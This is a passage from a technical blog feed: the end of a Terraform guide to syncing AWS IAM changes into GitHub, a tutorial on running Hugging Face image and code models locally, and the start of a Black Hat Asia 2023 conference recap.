  name              = <span class="hljs-attr">"/aws/lambda/${aws_lambda_function.lambda_function.function_name}"</span>
  retention_in_days = 7
}
</code></pre>
<h4 id="heading-s3-bucket-for-cloudtrail">S3 Bucket for CloudTrail</h4>
<p>This block creates an S3 bucket that will be used by CloudTrail for logging.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_s3_bucket"</span> <span class="hljs-string">"cloudtrail_bucket"</span> {
  bucket = local.s3_bucket_name
  force_destroy = true
}
</code></pre>
<h4 id="heading-cloudtrail-configuration">CloudTrail Configuration</h4>
<p>This block attaches a bucket policy that lets CloudTrail check the bucket ACL and write log files into the above-created S3 bucket. The trail itself is created in the next block.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_s3_bucket_policy"</span> <span class="hljs-string">"cloudtrail_bucket_policy"</span> {
  bucket = aws_s3_bucket.cloudtrail_bucket.id

  policy = jsonencode({
    Version = <span class="hljs-attr">"2012-10-17"</span>,
    Statement = [
      {
        Sid       = <span class="hljs-attr">"AWSCloudTrailAclCheck"</span>
        Effect    = <span class="hljs-attr">"Allow"</span>
        Principal = { Service = <span class="hljs-attr">"cloudtrail.amazonaws.com"</span> }
        Action    = <span class="hljs-string">"s3:GetBucketAcl"</span>
        Resource  = aws_s3_bucket.cloudtrail_bucket.arn
      },
      {
        Sid       = <span class="hljs-attr">"AWSCloudTrailWrite"</span>
        Effect    = <span class="hljs-attr">"Allow"</span>
        Principal = { Service = <span class="hljs-attr">"cloudtrail.amazonaws.com"</span> }
        Action    = <span class="hljs-string">"s3:PutObject"</span>
        Resource  = <span class="hljs-string">"${aws_s3_bucket.cloudtrail_bucket.arn}/*"</span>
        Condition = {
          StringEquals = { <span class="hljs-attr">"s3:x-amz-acl"</span> = <span class="hljs-attr">"bucket-owner-full-control"</span> }
        }
      }
    ]
  })
}
</code></pre>
<h4 id="heading-eventbridge-rule">EventBridge Rule</h4>
<p>This block first enables the CloudTrail trail on the bucket above, then creates an EventBridge rule to capture events related to IAM and AWS Organizations. IAM Roles &amp; Policies arrive with the event source <code>aws.iam</code>, while SCPs arrive with <code>aws.organizations</code>, so the rule matches both sources.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudtrail"</span> <span class="hljs-string">"cloudtrail"</span> {
  name                          = local.cloudtrail_name
  s3_bucket_name                = aws_s3_bucket.cloudtrail_bucket.bucket
  enable_logging                = true
  include_global_service_events = true
  is_multi_region_trail         = true
  enable_log_file_validation    = true
}

# Create EventBridge Rule
resource <span class="hljs-string">"aws_cloudwatch_event_rule"</span> <span class="hljs-string">"iam_and_orgs_rule"</span> {
  name        = local.eventbridge_name
  description = <span class="hljs-attr">"Capture events from IAM and Organizations"</span>

  event_pattern = jsonencode({
    <span class="hljs-attr">"source"</span> : [<span class="hljs-string">"aws.iam"</span>, <span class="hljs-string">"aws.organizations"</span>]
  })
}
</code></pre>
<h4 id="heading-lambda-permission-for-eventbridge">Lambda Permission for EventBridge</h4>
<p>This block allows EventBridge to invoke the Lambda function whenever the rule is triggered.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_lambda_permission"</span> <span class="hljs-string">"allow_eventbridge"</span> {
  statement_id  = <span class="hljs-attr">"AllowExecutionFromEventBridge"</span>
  action        = <span class="hljs-attr">"lambda:InvokeFunction"</span>
  function_name = aws_lambda_function.lambda_function.function_name
  principal     = <span class="hljs-attr">"events.amazonaws.com"</span>
  source_arn    = aws_cloudwatch_event_rule.iam_and_orgs_rule.arn
}
</code></pre>
<h4 id="heading-eventbridge-target">EventBridge Target</h4>
<p>This block sets the Lambda function as the target for the EventBridge rule, meaning the Lambda function will be invoked when the rule's conditions are met.</p>
<pre><code class="lang-json">resource <span class="hljs-string">"aws_cloudwatch_event_target"</span> <span class="hljs-string">"event_target"</span> {
  rule      = aws_cloudwatch_event_rule.iam_and_orgs_rule.name
  target_id = <span class="hljs-attr">"LambdaFunction"</span>
  arn       = aws_lambda_function.lambda_function.arn
}
</code></pre>
<h3 id="heading-test-the-setup">Test the setup</h3>
<p>There are many moving components. We need to test them one by one to make sure all the configurations are correct.</p>
<h4 id="heading-lambda-1">Lambda</h4>
<p>Lambda is the core of our operations. To ensure it has the required permissions, open the Lambda function in the console &amp; click on "Test". If the invocation succeeds, all good. If not, fix the reported errors.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037631790/14072732-aff1-4630-a5cb-38b1dd06bf87.png" alt class="image--center mx-auto" /></p>
<p>Click on the logs above to view the lambda output or for debugging purposes</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693037926961/b64fd699-5dd0-451d-a577-0934c0e7777b.png" alt class="image--center mx-auto" /></p>
<h4 id="heading-iam-1">IAM</h4>
<p>If everything is successful at the Lambda level, let's change an IAM policy &amp; see whether the rest of the pipeline detects it &amp; forwards the event to Lambda. I love SCPs, so I will edit an existing one.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038047062/77adfcd5-17a3-47ed-a158-cd93ff627b2a.png" alt class="image--center mx-auto" /></p>
<p>If you visit GitHub, you should see a commit with the updated SCP policy.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038135105/44376413-c4d4-44d8-a99f-19b000aad5d4.png" alt class="image--center mx-auto" /></p>
<p>You can view the full file &amp; the updated policy information.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693038254450/8384f548-89f1-41dd-bb76-875191d2c7e2.png" alt class="image--center mx-auto" /></p>
<p>If you want to dig deeper, you can look at the CloudWatch logs for the Lambda output, the EventBridge activity, etc.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693045620394/8681f197-41f8-4a10-9114-ff85620e97f2.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-delete-resources">Delete resources</h3>
<pre><code class="lang-bash"><span class="hljs-comment"># Delete terraform resources</span>
terraform destroy

<span class="hljs-comment"># Delete all images in the ECR repository</span>
aws ecr batch-delete-image --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span> --image-ids <span class="hljs-string">"<span class="hljs-subst">$(aws ecr list-images --region ${TF_VAR_REGION} --repository-name ${TF_VAR_ECR_REPO_NAME} --query 'imageIds[*]' --output json)</span>"</span>

<span class="hljs-comment"># Delete ECR repository</span>
aws ecr delete-repository --repository-name <span class="hljs-variable">${TF_VAR_ECR_REPO_NAME}</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1693046198714/15a52ae0-8850-4f20-a787-ed6c6ee5061d.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-further-enhancements">Further enhancements</h3>
<p>So far, we made sure any changes to AWS IAM are synchronized to GitHub. Once all the data lives in GitHub, we can write a GitHub Actions workflow that syncs policies from the repository back to AWS IAM, completing a pure GitOps loop.</p>
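<p>As a rough illustration of what that reverse path could run on every push - heavily simplified, and assuming the repository is extended to store the actual policy documents rather than just the metadata dumped above (<code>ACCOUNT_ID</code> is a placeholder) - a workflow step might look like:</p>
<pre><code class="lang-bash"># Hypothetical reverse-sync step: publish every policy document in the repo back to IAM
for file in policies/*.json; do
  policy_name=$(basename "$file" .json)
  policy_arn="arn:aws:iam::${ACCOUNT_ID}:policy/${policy_name}"

  # Promote the document stored in Git as the new default policy version
  aws iam create-policy-version --policy-arn "$policy_arn" \
    --policy-document "file://$file" --set-as-default
done
</code></pre>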
<h3 id="heading-conclusion">Conclusion</h3>
<p>In conclusion, we've walked you through a hands-on project that employs a range of AWS services, including Lambda, EventBridge, CloudTrail, CloudWatch, ECR, and S3, all orchestrated through Terraform, Docker &amp; AWS CLI. This guide serves as a robust starting point for anyone new to AWS, offering a practical way to gain hands-on experience. As you continue your journey in cloud computing, remember that the principles of GitOps can be applied far beyond IAM, serving as a foundational approach to cloud infrastructure management.</p>
]]></content:encoded></item><item><title><![CDATA[Securing Your Data With Local AI Model Execution: A Guide Using Hugging Face]]></title><description><![CDATA[In the ever-evolving landscape of artificial intelligence (AI), the potential for data breaches and leaks has become an alarming concern. Recent incidents involving AI tools like OpenAI's ChatGPT have sparked debates over data privacy and security. T...]]></description><link>https://blog.rewanthtammana.com/securing-your-data-with-local-ai-model-execution-a-guide-using-hugging-face</link><guid isPermaLink="true">https://blog.rewanthtammana.com/securing-your-data-with-local-ai-model-execution-a-guide-using-hugging-face</guid><category><![CDATA[AI]]></category><category><![CDATA[chatgpt]]></category><category><![CDATA[data privacy]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[huggingface]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 21 Jun 2023 12:45:39 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1687259522025/f13d27a8-d2e5-4d12-ad8f-ee45a5b70f55.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In the ever-evolving landscape of artificial intelligence (AI), the potential for data breaches and leaks has become an alarming concern. Recent incidents involving AI tools like OpenAI's ChatGPT have sparked debates over data privacy and security. These tools, while powerful, can inadvertently lead to the exposure of sensitive data if not used judiciously. For example, <a target="_blank" href="https://codeandhack.com/samsung-corporate-data-leaked-due-to-chatgpt/">Samsung Electronics experienced a data leak</a> when employees used ChatGPT to optimize their workflow, inadvertently causing confidential data to enter the chatbot's database.</p>
<p>Similarly, Apple and other major companies have <a target="_blank" href="https://www.theverge.com/2023/5/19/23729619/apple-bans-chatgpt-openai-fears-data-leak">restricted the use of AI tools</a> due to <a target="_blank" href="https://www.axios.com/2023/03/10/chatgpt-ai-cybersecurity-secrets">fears of confidential information being leaked or collected</a>. As AI continues to permeate various sectors, it's crucial to prioritize data security and privacy.</p>
<p>One effective strategy to balance these needs is running AI models locally, which is the central focus of this guide. But wait - training models locally requires high computational power, resources &amp; expertise. Instead, this guide explores how to run pre-trained models from Hugging Face on local systems without incurring massive costs.</p>
<h3 id="heading-the-power-of-local-ai-getting-started"><strong>The Power of Local AI: Getting Started</strong></h3>
<p>Let's start with something simple, like generating images from a given text.</p>
<p>I loved the research paper on <a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a> from Jonathan Ho. Although the proposed theory sounds promising, reproducing it can be challenging, and I'm not interested in spending a huge amount of money on an experiment driven by sheer curiosity.</p>
<p>With the enormous sources and data on the internet, I started exploring to find an existing model to run on a local system.</p>
<p>Navigating many resources, I stumbled across <a target="_blank" href="https://huggingface.co/">Hugging Face</a>, an AI model hub with over <code>231,836</code> models (as of this writing) and a vibrant, active community.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687076229829/15ce306d-63fb-432d-8605-7b9c2a589654.png" alt class="image--center mx-auto" /></p>
<p>Using Hugging Face's robust search features, you can quickly locate models by the research paper they cite, which makes it easy to find one built on Jonathan Ho's work that is ready for local execution. The paper, <a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a>, is cited as <a target="_blank" href="https://arxiv.org/abs/2207.12598">arXiv:2207.12598</a>. Many models are built on it, and since I didn't know which one to pick, I simply went with the highest-rated one, as any regular user would.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687075948491/56c7aca9-1ae4-40db-9085-018050ca790e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-hands-on-guide-to-local-ai-execution"><strong>Hands-On Guide to Local AI Execution</strong></h3>
<p>Let's look at how you can use this model for image generation. The following Python script shows how to set up a stable diffusion pipeline and generate images locally using the pre-compiled model, <a target="_blank" href="https://huggingface.co/runwayml/stable-diffusion-v1-5"><code>runwayml/stable-diffusion-v1-5</code></a>.</p>
<p>I'm on an M1 laptop, which supports the <em>mps</em> device type at runtime. Use whatever is supported on your system.</p>
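<p>If you're not sure what your machine supports, a quick check like this prints a reasonable device name (it assumes PyTorch is already installed, which the pipeline below needs anyway):</p>
<pre><code class="lang-bash">python3 -c "import torch; print('mps' if torch.backends.mps.is_available() else 'cuda' if torch.cuda.is_available() else 'cpu')"
</code></pre>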
<pre><code class="lang-python"><span class="hljs-keyword">from</span> diffusers <span class="hljs-keyword">import</span> DiffusionPipeline

pipeline = DiffusionPipeline.from_pretrained(<span class="hljs-string">"runwayml/stable-diffusion-v1-5"</span>)
pipeline = pipeline.to(<span class="hljs-string">"mps"</span>) <span class="hljs-comment"># cpu, cuda, mkldnn, opengl, opencl, ideep, hip, ve, fpga, ort, xla, lazy, vulkan, mps, meta, hpu, mtia, privateuseone</span>

<span class="hljs-comment"># Recommended if you have 8/16 GB RAM</span>
pipeline.enable_attention_slicing()

prompt = <span class="hljs-string">"a photo of an astronaut riding a horse on mars"</span>

<span class="hljs-comment"># Initialize the setup</span>
_ = pipeline(prompt,num_inference_steps=<span class="hljs-number">1</span>)

<span class="hljs-comment"># Generate images</span>
images = pipeline(prompt).images
<span class="hljs-keyword">for</span> index, image <span class="hljs-keyword">in</span> enumerate(images):
    image.save(<span class="hljs-string">"image{0}.jpg"</span>.format(index))
</code></pre>
<p>The generated image is as follows:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687152257986/14b9b2a6-3175-4b3a-8329-76b1689dc63b.jpeg" alt class="image--center mx-auto" /></p>
<h3 id="heading-unleashing-the-power-of-stable-diffusion-web-ui"><strong>Unleashing the power of Stable Diffusion Web UI</strong></h3>
<p>To make this process even more accessible and customizable, let's leverage <a target="_blank" href="https://github.com/AUTOMATIC1111/stable-diffusion-webui">Stable Diffusion Web UI</a>. This user-friendly interface allows you to adjust numerous parameters effortlessly. Here are step-by-step instructions on setting up and using the UI:</p>
<ol>
<li><p>Clone stable diffusion repository</p>
<pre><code class="lang-bash"> git <span class="hljs-built_in">clone</span> https://github.com/AUTOMATIC1111/stable-diffusion-webui.git
 <span class="hljs-built_in">cd</span> stable-diffusion-webui
</code></pre>
</li>
<li><p>Start a virtual environment to ensure we aren't messing with other packages.</p>
<pre><code class="lang-bash"> python3 -m virtualenv --python=<span class="hljs-string">"<span class="hljs-subst">$(command -v python3)</span>"</span> .env
 <span class="hljs-built_in">source</span> .env/bin/activate
</code></pre>
</li>
<li><p>Install required packages</p>
<pre><code class="lang-python"> pip install transformers==<span class="hljs-number">4.19</span><span class="hljs-number">.2</span> diffusers invisible-watermark
 pip install -r requirements.txt
</code></pre>
</li>
<li><p>On the model page, you can see the "files and versions" section that contains different pre-compiled files for this specific model.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079075115/903195b1-1e32-4929-8fa0-e7d46423b7e8.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>I've downloaded both models seen in the screenshot above. To get started, download the <code>v1-5-pruned-emaonly</code> model, as it's smaller. The files have the <code>ckpt</code> extension, which is a checkpoint file (most likely saved by PyTorch).</p>
<pre><code class="lang-bash"> <span class="hljs-built_in">cd</span> models/Stable-diffusion
 wget https://huggingface.co/runwayml/stable-diffusion-v1-5/resolve/main/v1-5-pruned-emaonly.ckpt
</code></pre>
</li>
<li><p>The WebUI provides a script to start a quick instance on a local port. It checks &amp; installs missing packages, if any.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079274013/4504c099-4c40-4f98-968e-6ba3a8474936.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>The script prints a lot of information in the output &amp; finally serves the UI on local port <code>7860</code>.</p>
<p> <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687079403721/c2948dc1-554c-4d76-a01b-5193f1b62ca7.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>The default configuration is in <code>configs/v1-inference.yaml</code>. We don't have to change it for this blog; the contents are shown below for reference. Feel free to modify them &amp; play around.</p>
<pre><code class="lang-yaml"> <span class="hljs-attr">model:</span>
   <span class="hljs-attr">base_learning_rate:</span> <span class="hljs-number">1.0e-04</span>
   <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.models.diffusion.ddpm.LatentDiffusion</span>
   <span class="hljs-attr">params:</span>
     <span class="hljs-attr">linear_start:</span> <span class="hljs-number">0.00085</span>
     <span class="hljs-attr">linear_end:</span> <span class="hljs-number">0.0120</span>
     <span class="hljs-attr">num_timesteps_cond:</span> <span class="hljs-number">1</span>
     <span class="hljs-attr">log_every_t:</span> <span class="hljs-number">200</span>
     <span class="hljs-attr">timesteps:</span> <span class="hljs-number">1000</span>
     <span class="hljs-attr">first_stage_key:</span> <span class="hljs-string">"jpg"</span>
     <span class="hljs-attr">cond_stage_key:</span> <span class="hljs-string">"txt"</span>
     <span class="hljs-attr">image_size:</span> <span class="hljs-number">64</span>
     <span class="hljs-attr">channels:</span> <span class="hljs-number">4</span>
     <span class="hljs-attr">cond_stage_trainable:</span> <span class="hljs-literal">false</span>   <span class="hljs-comment"># <span class="hljs-doctag">Note:</span> different from the one we trained before</span>
     <span class="hljs-attr">conditioning_key:</span> <span class="hljs-string">crossattn</span>
     <span class="hljs-attr">monitor:</span> <span class="hljs-string">val/loss_simple_ema</span>
     <span class="hljs-attr">scale_factor:</span> <span class="hljs-number">0.18215</span>
     <span class="hljs-attr">use_ema:</span> <span class="hljs-literal">False</span>

     <span class="hljs-attr">scheduler_config:</span> <span class="hljs-comment"># 10000 warmup steps</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.lr_scheduler.LambdaLinearScheduler</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">warm_up_steps:</span> [ <span class="hljs-number">10000</span> ]
         <span class="hljs-attr">cycle_lengths:</span> [ <span class="hljs-number">10000000000000</span> ] <span class="hljs-comment"># incredibly large number to prevent corner cases</span>
         <span class="hljs-attr">f_start:</span> [ <span class="hljs-number">1.e-6</span> ]
         <span class="hljs-attr">f_max:</span> [ <span class="hljs-number">1</span><span class="hljs-string">.</span> ]
         <span class="hljs-attr">f_min:</span> [ <span class="hljs-number">1</span><span class="hljs-string">.</span> ]

     <span class="hljs-attr">unet_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.modules.diffusionmodules.openaimodel.UNetModel</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">image_size:</span> <span class="hljs-number">32</span> <span class="hljs-comment"># unused</span>
         <span class="hljs-attr">in_channels:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">out_channels:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">model_channels:</span> <span class="hljs-number">320</span>
         <span class="hljs-attr">attention_resolutions:</span> [ <span class="hljs-number">4</span>, <span class="hljs-number">2</span>, <span class="hljs-number">1</span> ]
         <span class="hljs-attr">num_res_blocks:</span> <span class="hljs-number">2</span>
         <span class="hljs-attr">channel_mult:</span> [ <span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">4</span>, <span class="hljs-number">4</span> ]
         <span class="hljs-attr">num_heads:</span> <span class="hljs-number">8</span>
         <span class="hljs-attr">use_spatial_transformer:</span> <span class="hljs-literal">True</span>
         <span class="hljs-attr">transformer_depth:</span> <span class="hljs-number">1</span>
         <span class="hljs-attr">context_dim:</span> <span class="hljs-number">768</span>
         <span class="hljs-attr">use_checkpoint:</span> <span class="hljs-literal">True</span>
         <span class="hljs-attr">legacy:</span> <span class="hljs-literal">False</span>

     <span class="hljs-attr">first_stage_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.models.autoencoder.AutoencoderKL</span>
       <span class="hljs-attr">params:</span>
         <span class="hljs-attr">embed_dim:</span> <span class="hljs-number">4</span>
         <span class="hljs-attr">monitor:</span> <span class="hljs-string">val/rec_loss</span>
         <span class="hljs-attr">ddconfig:</span>
           <span class="hljs-attr">double_z:</span> <span class="hljs-literal">true</span>
           <span class="hljs-attr">z_channels:</span> <span class="hljs-number">4</span>
           <span class="hljs-attr">resolution:</span> <span class="hljs-number">256</span>
           <span class="hljs-attr">in_channels:</span> <span class="hljs-number">3</span>
           <span class="hljs-attr">out_ch:</span> <span class="hljs-number">3</span>
           <span class="hljs-attr">ch:</span> <span class="hljs-number">128</span>
           <span class="hljs-attr">ch_mult:</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">1</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">2</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">4</span>
           <span class="hljs-bullet">-</span> <span class="hljs-number">4</span>
           <span class="hljs-attr">num_res_blocks:</span> <span class="hljs-number">2</span>
           <span class="hljs-attr">attn_resolutions:</span> []
           <span class="hljs-attr">dropout:</span> <span class="hljs-number">0.0</span>
         <span class="hljs-attr">lossconfig:</span>
           <span class="hljs-attr">target:</span> <span class="hljs-string">torch.nn.Identity</span>

     <span class="hljs-attr">cond_stage_config:</span>
       <span class="hljs-attr">target:</span> <span class="hljs-string">ldm.modules.encoders.modules.FrozenCLIPEmbedder</span>
</code></pre>
</li>
<li><p>Let's access the application in a web browser, <a target="_blank" href="http://127.0.0.1:7860/">http://127.0.0.1:7860/</a></p>
</li>
<li><p>I've given a prompt, <code>astronaut eating food</code> &amp; below is the generated image.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687156476754/397d5c42-454b-4800-bc63-53260637365f.png" alt class="image--center mx-auto" /></p>
</li>
<li><p>Increasing the batch size generates multiple images in one go, &amp; there are numerous other configurable parameters to explore.</p>
</li>
</ol>
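<p>For reference, here's what launching the WebUI from the cloned repository looks like. This is a minimal sketch; the script name comes from the AUTOMATIC1111 project, and the <code>--port</code> flag is an assumption based on its launch options at the time of writing, so check the project README for the exact flags.</p>
<pre><code class="lang-bash"># From the root of the stable-diffusion-webui repository.
# The script installs any missing Python dependencies before starting the server.
./webui.sh

# Optionally pick a different port (assumed flag; defaults to 7860)
./webui.sh --port 7860
</code></pre>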
<h3 id="heading-demystifying-ai-image-generation"><strong>Demystifying AI Image Generation</strong></h3>
<p>You may be wondering how the model creates these images from text prompts. The Stable Diffusion Web UI provides an "interrogate clip" feature to demystify this process. This tool allows you to probe how a model interprets an image, and you can then modify the generated interpretation to create new images.</p>
<p>The image below was generated with the prompt <code>astronaut sitting on a horse</code>. I loaded the generated image into the <code>img2img</code> tab and clicked the interrogate button.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687156771385/4eaa02da-6fc1-4f63-911c-98df82f79a67.png" alt class="image--center mx-auto" /></p>
<p>Now we know what kind of prompt produces this image. For instance, the "interrogate clip" output describes part of the picture as a red sky. Let's change that to "blue sky" and regenerate the image.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687157217711/b9192df8-2cbc-45cb-8cb8-4b1caf32dee1.png" alt class="image--center mx-auto" /></p>
<p>Tweaking the parameters of an image is fun. Let's change the "astronaut" to a man in a "tuxedo" &amp; see what it generates.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687157419547/b21cd813-980e-4e81-8fa3-62ca5e94a091.png" alt class="image--center mx-auto" /></p>
<p>The above process helps decode how a model interprets a given image as text &amp; helps us write better prompts to generate the pictures we want.</p>
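<p>If you'd rather script this interrogation flow than click through the UI, the WebUI can also be started with its API enabled. The sketch below assumes the <code>--api</code> flag and the <code>/sdapi/v1/interrogate</code> endpoint exposed by the AUTOMATIC1111 project at the time of writing; verify both against your installed version before relying on them.</p>
<pre><code class="lang-bash"># Start the WebUI with the REST API enabled (assumed flag)
./webui.sh --api

# Ask the CLIP interrogator to describe a local image (assumed endpoint &amp; payload shape).
# "astronaut.png" is a placeholder path; "base64 -w0" is GNU coreutils (use "base64 -i astronaut.png" on macOS).
curl -s http://127.0.0.1:7860/sdapi/v1/interrogate \
  -H "Content-Type: application/json" \
  -d "{\"image\": \"$(base64 -w0 astronaut.png)\", \"model\": \"clip\"}"
</code></pre>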
<h3 id="heading-going-beyond-images-code-generation-with-ai"><strong>Going Beyond Images: Code Generation with AI</strong></h3>
<p>While image generation is exciting, what about code generation? On Hugging Face, a separate category called <a target="_blank" href="https://huggingface.co/models?other=custom_code"><em>custom_code</em></a> offers models for generating and interpreting custom code. One such model is <a target="_blank" href="https://huggingface.co/bigcode/santacoder"><code>bigcode/santacoder</code></a>, which auto-fills Python code similarly to GitHub Copilot but operates locally.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1687158271623/9e3505fe-c4a6-41fc-98c6-02def20bcf3d.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-python"><span class="hljs-comment"># pip install -q transformers</span>
<span class="hljs-keyword">from</span> transformers <span class="hljs-keyword">import</span> AutoModelForCausalLM, AutoTokenizer

checkpoint = <span class="hljs-string">"bigcode/santacoder"</span>
device = <span class="hljs-string">"cuda"</span> <span class="hljs-comment"># for GPU usage or "cpu" for CPU usage</span>

tokenizer = AutoTokenizer.from_pretrained(checkpoint)
model = AutoModelForCausalLM.from_pretrained(checkpoint, trust_remote_code=<span class="hljs-literal">True</span>).to(device)

inputs = tokenizer.encode(<span class="hljs-string">"def print_hello_world():"</span>, return_tensors=<span class="hljs-string">"pt"</span>).to(device)
outputs = model.generate(inputs)
print(tokenizer.decode(outputs[<span class="hljs-number">0</span>]))
</code></pre>
<p>The generated output is as follows:</p>
<pre><code class="lang-python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">print_hello_world</span>():</span>
    print(<span class="hljs-string">"Hello World!"</span>)
</code></pre>
<h3 id="heading-the-possibilities-are-endless"><strong>The possibilities are endless</strong></h3>
<p>The exploration doesn't stop at code autofill. You'll find models that generate code from textual input, detect errors in your code, and even suggest security improvements.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>This guide has highlighted the importance of data security in the AI landscape and the power of local AI execution. Leveraging AI is an integral part of technological evolution and workflow optimization. However, it's equally essential to maintain data security and privacy. Thus, running AI models on local systems provides an excellent solution to balance efficiency and data protection.</p>
<p>In an ever-evolving technological landscape, local AI execution using platforms like Hugging Face ensures we remain at the forefront of AI advancements while prioritizing data security. So, gear up and experiment with AI locally - the possibilities are endless!</p>
<h3 id="heading-references">References</h3>
<ul>
<li><p><a target="_blank" href="https://huggingface.co/">Hugging face</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/AUTOMATIC1111/stable-diffusion-webui">Stable Diffusion WebUI</a></p>
</li>
<li><p><a target="_blank" href="https://codeandhack.com/samsung-corporate-data-leaked-due-to-chatgpt/">Samsung data leak</a></p>
</li>
<li><p><a target="_blank" href="https://www.theverge.com/2023/5/19/23729619/apple-bans-chatgpt-openai-fears-data-leak">Apple bans ChatGPT</a></p>
</li>
<li><p><a target="_blank" href="https://www.axios.com/2023/03/10/chatgpt-ai-cybersecurity-secrets">Corporates' data security fear due to ChatGPT</a></p>
</li>
<li><p><a target="_blank" href="https://arxiv.org/abs/2207.12598">Classifier Free Diffusion Guidance</a></p>
</li>
<li><p><a target="_blank" href="https://huggingface.co/bigcode/santacoder">bigcode/santacoder model</a></p>
</li>
<li><p><a target="_blank" href="https://huggingface.co/runwayml/stable-diffusion-v1-5">runwayml/stable-diffusion-v1-5 model</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Reflections on Black Hat Asia 2023: Learning, Networking, and Inspiration]]></title><description><![CDATA[Black Hat Asia 2023, held in the vibrant city of Singapore, surpassed all expectations as it brought together cybersecurity professionals from across the globe. This prestigious event served as a hub for knowledge sharing, networking opportunities, a...]]></description><link>https://blog.rewanthtammana.com/reflections-on-black-hat-asia-2023-learning-networking-and-inspiration</link><guid isPermaLink="true">https://blog.rewanthtammana.com/reflections-on-black-hat-asia-2023-learning-networking-and-inspiration</guid><category><![CDATA[Security]]></category><category><![CDATA[conference]]></category><category><![CDATA[research]]></category><category><![CDATA[networking]]></category><category><![CDATA[trends]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Thu, 18 May 2023 10:37:18 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1684405367495/69f9d2b0-7e6e-45bf-b984-29f63222aa44.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Black Hat Asia 2023, held in the vibrant city of Singapore, surpassed all expectations as it brought together cybersecurity professionals from across the globe. This prestigious event served as a hub for knowledge sharing, networking opportunities, and an abundance of inspiration, leaving attendees empowered and enlightened.</p>
<p>At Black Hat Asia 2023, I had the chance to demonstrate our tool, <a target="_blank" href="https://github.com/rewanthtammana/Damn-Vulnerable-Bank">Damn Vulnerable Bank</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684400947826/3b04deaf-f11a-49d3-ad4a-0089751acc17.png" alt="Damn Vulnerable Bank" /></p>
<p>The entire arsenal of presenters!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684408769843/fd2fc865-c05a-4d68-9f3e-81034688c7ca.jpeg" alt class="image--center mx-auto" /></p>
<p>The conference featured an extensive lineup of captivating sessions that showcased the forefront of cybersecurity advancements. Among the standout presentations, Xiaosheng Tan's keynote tackled the pressing importance of data security, shedding light on emerging laws and regulations shaping the landscape. Notably, Tan emphasized the significance of Privacy Enhanced Computing (PEC) and its potential impact on the industry.</p>
<p>Another noteworthy session was "Automated Bots as Threat Actors," which delved into the integration of machine learning (ML) and artificial intelligence (AI) in the realm of security. Attendees were captivated by the discussion on leveraging ML and AI to detect patterns, identify attacks, and combat the increasing sophistication of threat actors.</p>
<p>During the event, attention was drawn to the Darknet's "Bots as a Service (BaaS)" offering, revealing the underground economy that fuels cybercrime. The exposure of tools like <a target="_blank" href="https://github.com/openbullet/OpenBullet2">OpenBullet2</a> and the exploration of various language models such as GPT-3, GPT-4, LaMDA, BLOOM, XLNet, GPT-Neo, Ernie 3.0 Titan, Minerva, and LLaMA opened new possibilities in areas like credential stuffing attacks and TTP extraction using ML models.</p>
